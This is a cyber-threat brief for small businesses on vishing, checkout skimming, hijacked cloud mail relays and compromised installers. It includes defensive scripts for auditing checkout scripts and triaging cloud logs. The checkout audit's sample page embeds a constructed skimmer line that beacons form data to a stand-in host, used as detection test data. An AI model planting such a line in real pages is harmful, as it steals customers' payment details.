What to look out for today
Today’s theme is attackers using social engineering and trusted services to get access, steal data or abuse your systems:
- Voice phishing (vishing) pretending to be IT support to persuade staff to start screen-sharing and install remote tools (reported in targeted campaigns against professional services).
- Online payment/checkout card theft where criminals hide skimming and data collection behind legitimate infrastructure (a campaign that stored stolen card data on Stripe’s own infrastructure has been reported).
- Cloud servers hijacked and used as “quiet” email relays (covert SMTP relays) across AWS, Azure and Google Cloud. If it happens to you, expect it to surface as account compromise, unexpected email sending, and damage to your domain/IP sending reputation.
- Software supply-chain compromise (a Windows browser download compromised to deliver a cryptominer), reminding SMEs to treat “free tools” and browser installs as a real risk.
- Event-themed scams (World Cup 2026) that can spill into workplaces via personal devices, phishing and account takeovers.
Why this matters to smaller businesses
- One convincing call can bypass email security: if a user is talked into screen-sharing or installing a remote tool, attackers may gain access without sending a “malicious” attachment.
- E-commerce and donation pages are high-value: if your checkout is skimmed, you may face chargebacks, customer complaints, and reporting obligations—even if the attacker used a trusted platform in the background.
- Cloud misuse can look like “normal IT”: hijacked servers relaying email may only show up as odd billing, spam complaints, or Microsoft/Google warnings about sending reputation.
- Supplier and app trust is a weak spot: a compromised browser/app installer can introduce unwanted software and performance issues, and can be a stepping stone to wider compromise.
Warning signs
- Staff receive an unexpected call claiming to be “IT”, “Microsoft/Google”, your “MSP”, or a “data migration” team asking for urgent screen share.
- Any request to install “remote support”, “RMM”, “security update tool”, or to approve a sign-in/MFA prompt while on the phone.
- New or unexplained admin tools appearing on PCs (remote control apps, monitoring agents) or new browser extensions.
- Website checkout anomalies: sudden checkout page changes, unfamiliar scripts, customer reports of fraud after buying/donating, increased chargebacks.
- Email oddities: spikes in outbound email, unusual “sent” items, mail delivery blocks, or warnings about spam/reputation from your email provider.
- PCs becoming unusually slow/hot or fans running constantly (possible miner/unwanted software).
- World Cup/streaming links shared in chat, or staff installing “streaming apps” on work devices.
How attackers may exploit the situation
- Vishing playbooks: attackers use invoice/data-migration pretexts to get a conversation going, then steer users into screen-sharing and installing remote access tools to capture credentials and data.
- Payment skimming via trusted infrastructure: by sending stolen card data to a payment provider’s own platform, criminals make the exfiltration look like legitimate traffic, so basic website checks are less likely to spot it and the skimmer stays in place longer.
- Cloud/email relay abuse: compromised cloud accounts/servers can be repurposed to send email through your infrastructure, which can support phishing, fraud and business email compromise, while harming deliverability for your legitimate mail.
- Compromised downloads: users installing a browser/tool from what looks like the normal source can end up running additional unwanted software (e.g., a cryptominer), creating performance issues and increasing risk.
What to do today
- Brief staff (2 minutes): “No screen-sharing or remote tool installs from inbound calls. Hang up and ring IT/MSP back using a known number.”
- Set a ‘call-back’ rule for finance, HR and reception/admin teams (the usual first targets).
- Check your website checkout: ensure only expected scripts run on payment/checkout pages; review recent site/plugin/theme changes; confirm who can deploy changes and whether MFA is enforced.
- Review cloud and email activity: look for new access keys, new outbound mail patterns, or unexpected instances/servers; ensure alerts are enabled for suspicious sign-ins.
- Control software installs: restrict who can install browsers/extensions; remove unapproved remote access tools and extensions.
- If you use WordPress: confirm you know who owns plugin updates and monitoring, especially for forms and checkout components.
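The checkout check in the list above (“ensure only expected scripts run on payment/checkout pages”) can be made concrete. The script below is an added example for this brief, not code from any report or vendor cited here: it parses a checkout page, flags external scripts whose host is not on an allowlist and inline scripts whose hash is not in a baseline, and emits the Content-Security-Policy `script-src` directive that would make the browser enforce the same allowlist. The hostnames (`shop.example`, `static.cdn-assets.invalid`), the allowlist, the baseline and the sample page are all constructed for the demo; the only real names are `js.stripe.com` and the standard library calls.

```python
"""Audit a checkout page for scripts that are not on an allowlist.

Added example for this brief, not code from any report or vendor it cites.
The sample page, hostnames, allowlist and baseline hash are constructed.
"""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: only our own origin and the payment provider's script host
# should ever serve scripts on the checkout page.
PAGE_HOST = "shop.example"
ALLOWED_SCRIPT_HOSTS = {"shop.example", "js.stripe.com"}


def csp_hash(script_text):
    """CSP hash source for an inline script: 'sha256-<base64 of SHA-256 of the text>'."""
    digest = hashlib.sha256(script_text.encode("utf-8")).digest()
    return "sha256-" + base64.b64encode(digest).decode("ascii")


class ScriptCollector(HTMLParser):
    """Collect external <script src> values and the exact text of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._buf = None  # list while inside an inline <script>, otherwise None

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def audit_checkout(html, page_host, allowed_hosts, baseline_inline_hashes):
    """Return (kind, detail) for every script that is not allowlisted or baselined."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).netloc.lower() or page_host  # relative src = same origin
        if host not in allowed_hosts:
            findings.append(("unexpected external script", src))
    for body in parser.inline:
        h = csp_hash(body)
        if h not in baseline_inline_hashes:
            findings.append(("unknown inline script", h))
    return findings


def script_src_policy(page_host, allowed_hosts, baseline_inline_hashes):
    """CSP script-src directive that makes the browser enforce the same allowlist."""
    sources = ["'self'"]
    sources += sorted("https://" + h for h in allowed_hosts if h != page_host)
    sources += sorted("'%s'" % h for h in baseline_inline_hashes)
    return "script-src " + " ".join(sources)


# Constructed sample: one inline script we have baselined, one we have not,
# and one external script from a host that is not on the allowlist.
KNOWN_INLINE = "window.shopConfig = {currency: 'GBP'};"
BASELINE = {csp_hash(KNOWN_INLINE)}
SAMPLE_PAGE = (
    '<html><head>'
    '<script src="/static/checkout.js"></script>'
    '<script src="https://js.stripe.com/v3/"></script>'
    '<script>' + KNOWN_INLINE + '</script>'
    '<script src="https://static.cdn-assets.invalid/jquery.min.js"></script>'
    "<script>navigator.sendBeacon('https://static.cdn-assets.invalid/c', "
    "new FormData(document.forms[0]));</script>"
    '</head><body></body></html>'
)

if __name__ == "__main__":
    for kind, detail in audit_checkout(SAMPLE_PAGE, PAGE_HOST, ALLOWED_SCRIPT_HOSTS, BASELINE):
        print(kind + ":", detail)
    print(script_src_policy(PAGE_HOST, ALLOWED_SCRIPT_HOSTS, BASELINE))
```

Two caveats. The hash is over the exact inline text, so a CMS or plugin that reflows whitespace changes it; re-baseline after every deliberate deployment and treat any other change as a finding. And because the reported campaign sent stolen card data to the payment provider’s own infrastructure, allowlisting the provider’s script host says nothing about whether data flowing to that provider is legitimate: the check above targets the injected script itself, not its destination, and should be run against the live page on a schedule rather than once.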
Ask your IT provider
- “Do we have a documented procedure for inbound ‘IT support’ calls, and do staff know the rule to call back on a known number?”
- “Can you show me recent remote access tool installs and confirm only approved tools are allowed?”
- “Do we monitor unusual outbound email and cloud activity (new logins/keys/servers), and who gets the alerts?”
- “For our website/checkout: who monitors for unexpected script changes and how quickly would we know if card skimming was suspected?”
- “Do we have a browser extension policy and reporting route for suspicious extensions or sudden device slowness?”
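The cloud and email review in the “what to do today” list and the monitoring question above (“new logins/keys/servers” and “unusual outbound email”) can be turned into a first-pass triage. The script below is an added example for this brief, not tooling from any report cited here. It reads CloudTrail-shaped records (real CloudTrail field names; the values, the AWS documentation account ID 123456789012 and the TEST-NET addresses are constructed) and flags access keys, users or servers created by anyone outside a small known-admin set, plus console sign-ins that succeeded without MFA; it then counts outbound mail per sender per hour against a threshold. The admin list and the 50-per-hour threshold are assumptions to tune for your own estate, and Azure and Google Cloud audit logs would need their own field names.

```python
"""Triage constructed cloud audit events and outbound-mail counts for the
signs listed in this brief: new access keys, unexpected servers, sign-ins
without MFA, and mail spikes.

Added example for this brief; not tooling from any cited report. Records use
AWS CloudTrail field names with constructed values.
"""
from collections import Counter
from datetime import datetime

# Assumption: the only principals expected to create keys, users or servers.
KNOWN_ADMINS = {"arn:aws:iam::123456789012:user/ops-admin"}
# Assumption: a small business rarely sends more than this per sender per hour.
MAIL_PER_HOUR_THRESHOLD = 50

# CloudTrail event names that deserve a second look in a small estate.
SENSITIVE_EVENTS = {
    "CreateAccessKey": "new access key created",
    "CreateUser": "new IAM user created",
    "RunInstances": "server launched",
}


def triage_cloudtrail(records, known_admins):
    """Return (eventTime, reason, actor ARN, source IP) for events to review."""
    alerts = []
    for r in records:
        name = r.get("eventName")
        actor = r.get("userIdentity", {}).get("arn", "unknown")
        ip = r.get("sourceIPAddress", "?")
        when = r.get("eventTime", "?")
        if name == "ConsoleLogin":
            succeeded = r.get("responseElements", {}).get("ConsoleLogin") == "Success"
            mfa = r.get("additionalEventData", {}).get("MFAUsed") == "Yes"
            if succeeded and not mfa:
                alerts.append((when, "console sign-in without MFA", actor, ip))
        elif name in SENSITIVE_EVENTS and actor not in known_admins:
            alerts.append((when, SENSITIVE_EVENTS[name] + " by non-admin", actor, ip))
    return alerts


def mail_spikes(sends, threshold):
    """sends: iterable of (ISO-8601 timestamp, sender). Return (sender, hour, count) over threshold."""
    per_hour = Counter()
    for ts, sender in sends:
        hour = datetime.fromisoformat(ts).strftime("%Y-%m-%dT%H:00")
        per_hour[(sender, hour)] += 1
    return sorted((s, h, n) for (s, h), n in per_hour.items() if n > threshold)


# Constructed sample: an admin rotating a key (fine), then a web-marketing
# user signing in without MFA, minting a key and launching a server.
SAMPLE_EVENTS = [
    {"eventTime": "2024-05-01T08:02:11Z", "eventName": "CreateAccessKey",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ops-admin"},
     "sourceIPAddress": "203.0.113.10"},
    {"eventTime": "2024-05-01T08:40:03Z", "eventName": "ConsoleLogin",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/marketing-web"},
     "sourceIPAddress": "198.51.100.7",
     "responseElements": {"ConsoleLogin": "Success"},
     "additionalEventData": {"MFAUsed": "No"}},
    {"eventTime": "2024-05-01T08:41:50Z", "eventName": "CreateAccessKey",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/marketing-web"},
     "sourceIPAddress": "198.51.100.7"},
    {"eventTime": "2024-05-01T08:45:22Z", "eventName": "RunInstances",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/marketing-web"},
     "sourceIPAddress": "198.51.100.7", "awsRegion": "eu-west-1"},
    {"eventTime": "2024-05-01T09:00:00Z", "eventName": "DescribeInstances",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/marketing-web"},
     "sourceIPAddress": "198.51.100.7"},
]

# Constructed sample: 60 messages from one sender in a single hour, 5 from another.
SAMPLE_SENDS = (
    [("2024-05-01T09:%02d:00" % (i % 60), "noreply@shop.example") for i in range(60)]
    + [("2024-05-01T09:05:00", "sales@shop.example")] * 5
)

if __name__ == "__main__":
    for alert in triage_cloudtrail(SAMPLE_EVENTS, KNOWN_ADMINS):
        print("REVIEW", *alert)
    for spike in mail_spikes(SAMPLE_SENDS, MAIL_PER_HOUR_THRESHOLD):
        print("MAIL SPIKE", *spike)
```

A server launched by a principal that has never launched one, or a key minted minutes after an MFA-less sign-in, is exactly the pattern behind “hijacked servers quietly relaying email”; the first follow-up is to disable the key, check what the new server is doing, and look at your provider’s sending-reputation warnings for the same window.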
Patch watch
If you run a WordPress site, pay extra attention to forms plugins: there are reports of active exploitation of a critical flaw in the Everest Forms Pro plugin. Even if you outsource your website, confirm today who is responsible for urgent plugin updates and how quickly they can react if a plugin is being exploited in the wild.
One action today
Send a same-day staff note: ‘If “IT support” calls you, do not screen-share or install tools—hang up and call IT/MSP back on the number in our directory.’
Related Actions On Cyber resource
Use the Actions On Cyber ‘Stop vishing & remote-access scams’ mini-checklist (staff call-back rule + approved remote tools + reporting steps).
Sources
- Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms (Google Threat Intelligence)
- Credit card theft campaign abuses Stripe to host stolen payment info (BleepingComputer)
- PCPJack Hijacks 230 AWS, Google Cloud, and Azure Servers for Covert SMTP Relay Network (The Hacker News)
- Hola Browser for Windows compromised to deliver cryptominer (BleepingComputer)
- FIFA World Cup 2026 Scams Are Already Live: Fake Sites, Banking Malware, and Stolen Logins (The Hacker News)
- Hackers Exploit Critical Everest Forms Pro WordPress Plugin Flaw to Take Over Sites (The Hacker News)
This brief is for general awareness and does not replace advice from your IT provider, legal adviser, insurer or incident response specialist.